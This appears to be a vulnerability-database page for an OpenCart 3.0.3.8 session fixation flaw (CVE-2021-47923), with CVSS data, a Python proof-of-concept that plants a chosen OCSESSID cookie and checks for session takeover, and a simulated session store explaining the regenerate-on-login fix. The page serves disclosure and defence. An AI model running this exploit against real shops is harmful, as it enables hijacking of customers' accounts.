Security Vulnerability Report
CVE-2021-47923 CVSS 9.8 CRITICAL

CVE-2021-47923

Published: 2026-05-10 13:16:28
Last Modified: 2026-05-12 14:24:15

Description

OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts.

The root cause is that the server adopts a session identifier supplied by the client instead of issuing one itself, and does not issue a new identifier when the session becomes authenticated. Exploitation therefore needs two things the base score does not reflect: the attacker must first get the chosen OCSESSID value into the victim's browser (for example through a cookie-setting injection on a related host, a script injection, or a cleartext HTTP connection), and the victim must then log in while that cookie is set. Once that happens the attacker, who already knows the identifier, presents the same cookie and is treated as the logged-in user.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (secondary)
9.3 CRITICAL (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)
Weakness
CWE-290 (Authentication Bypass by Spoofing)

Configurations (Affected Products)

No CPE configuration data is published for this entry. The affected product named in the description is OpenCart 3.0.3.8.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def ocsessid_values(jar):
    # A requests cookie jar can hold more than one cookie named OCSESSID (the
    # one planted without a domain plus one the server set for its host), and
    # jar["OCSESSID"] raises CookieConflictError in that case, so collect them all.
    return [c.value for c in jar if c.name == "OCSESSID"]


def check_session_fixation(target_url, email, password):
    # Attacker-chosen session ID. OpenCart issues 26-character hex IDs, so use the
    # same shape; a value containing underscores can be rejected by a server-side
    # format check before the fixation behaviour is ever exercised.
    malicious_session_id = "0123456789abcdef0123456789"
    login_endpoint = target_url + "/index.php?route=account/login"
    account_endpoint = target_url + "/index.php?route=account/account"

    # Step 1: Attacker sets the malicious cookie (in a real attack it is planted
    # in the victim's browser; here the test client plays the victim)
    session = requests.Session()
    session.cookies.set("OCSESSID", malicious_session_id)

    # Step 2: Victim logs in using the session with the fixed ID
    # Note: valid credentials for a test account are required for the login to succeed
    login_data = {"email": email, "password": password}
    session.post(login_endpoint, data=login_data)

    # Step 3: Check whether the server kept the fixed session ID after login.
    # An unchanged jar alone is not proof (a server that never re-sends the cookie
    # looks the same), which is why Step 4 confirms the ID is authenticated.
    if ocsessid_values(session.cookies) == [malicious_session_id]:
        print("[+] Vulnerability Confirmed: Server accepted the fixed session ID.")
        # Step 4: Verify attacker can access the account using the fixed ID
        attacker_session = requests.Session()
        attacker_session.cookies.set("OCSESSID", malicious_session_id)
        verify_resp = attacker_session.get(account_endpoint)
        if verify_resp.status_code == 200 and "Logout" in verify_resp.text:
            print("[+] Session Hijacking Successful: Attacker accessed the account.")
        else:
            print("[-] Fixed ID was kept but the account page is not authenticated; check the test credentials.")
    else:
        print("[-] Server replaced the session ID on login; target appears patched or not vulnerable.")


if __name__ == "__main__":
    target = "http://localhost/opencart"
    # Placeholder credentials for a test account you own
    check_session_fixation(target, "victim@example.com", "password")
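The PoC above observes the symptom from outside. The following added example is not part of this page or of OpenCart's code base: it is a constructed simulation (SessionStore and its method names are hypothetical, and the 26-hex-character ID format is an assumption modelled on the IDs OpenCart issues) that isolates the two server-side properties session fixation depends on, so a reader can see which fix actually closes the hole: whether the server adopts a session ID it never issued, and whether it regenerates the ID on login. It also runs the variant where the attacker first obtains a genuine ID by visiting the site and plants that one.

```python
import re
import secrets

# Constructed simulation of server-side session handling. This is not OpenCart
# code; SessionStore and its method names are hypothetical. The ID format
# (26 hex characters) is an assumption modelled on the IDs OpenCart issues.
SESSION_ID_RE = re.compile(r"^[a-f0-9]{26}$")


class SessionStore:
    """In-memory session store with the two switches that decide fixation."""

    def __init__(self, regenerate_on_login, accept_unknown_ids):
        self.regenerate_on_login = regenerate_on_login  # issue a new ID at login?
        self.accept_unknown_ids = accept_unknown_ids    # adopt IDs we never issued?
        self.data = {}  # session_id -> session data

    def new_id(self):
        return secrets.token_hex(13)  # 13 bytes -> 26 hex characters

    def start(self, cookie_id):
        """Resolve the session for a request whose OCSESSID cookie is cookie_id.

        Vulnerable mode adopts any well-formed ID the client sends, even one the
        server never issued; hardened mode honours only IDs present in the store
        and otherwise starts a fresh session.
        """
        if cookie_id and SESSION_ID_RE.match(cookie_id):
            if cookie_id in self.data or self.accept_unknown_ids:
                self.data.setdefault(cookie_id, {})
                return cookie_id
        sid = self.new_id()
        self.data[sid] = {}
        return sid

    def login(self, sid, customer):
        """Authenticate the session; hardened mode migrates it to a new ID."""
        if self.regenerate_on_login:
            new_sid = self.new_id()
            self.data[new_sid] = self.data.pop(sid, {})  # old ID is destroyed
            sid = new_sid
        self.data[sid]["customer_id"] = customer
        return sid

    def whoami(self, sid):
        return self.data.get(sid, {}).get("customer_id")


def fixation_attack(store, planted="deadbeef" * 3 + "ab"):
    """Attacker plants an ID in the victim's browser, the victim logs in, the
    attacker presents the same ID. Returns whom the attacker is authenticated
    as, or None if the attack failed."""
    victim_sid = store.start(planted)               # victim's browser sends the planted cookie
    store.login(victim_sid, "victim@example.com")   # victim authenticates
    attacker_sid = store.start(planted)             # attacker reuses the value it chose
    return store.whoami(attacker_sid)


def fixation_attack_with_issued_id(store):
    """Variant: attacker first obtains a genuine ID by visiting the site, then
    plants that one. This defeats 'reject unknown IDs' when used on its own."""
    issued = store.start(None)
    return fixation_attack(store, planted=issued)


if __name__ == "__main__":
    for regen, accept in [(False, True), (True, True), (False, False), (True, False)]:
        print(f"regenerate_on_login={regen!s:5} accept_unknown_ids={accept!s:5} "
              f"planted={fixation_attack(SessionStore(regen, accept))} "
              f"issued={fixation_attack_with_issued_id(SessionStore(regen, accept))}")
```

Only the combination of adopting unknown IDs and keeping the ID across login is exploitable with a planted value, but refusing unknown IDs alone is not enough: an attacker who obtains a legitimately issued ID first and plants that one still wins. Regenerating the identifier on authentication (and destroying the old one) is the fix to rely on, because it closes both variants.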

References

https://www.exploit-db.com/exploits/50555
https://www.opencart.com/
https://www.vulncheck.com/advisories/opencart-session-fixation-via-ocsessid-cookie

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47923", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:28.170", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50555", "source": "[email protected]"}, {"url": "https://www.opencart.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/opencart-session-fixation-via-ocsessid-cookie", "source": "[email protected]"}]}}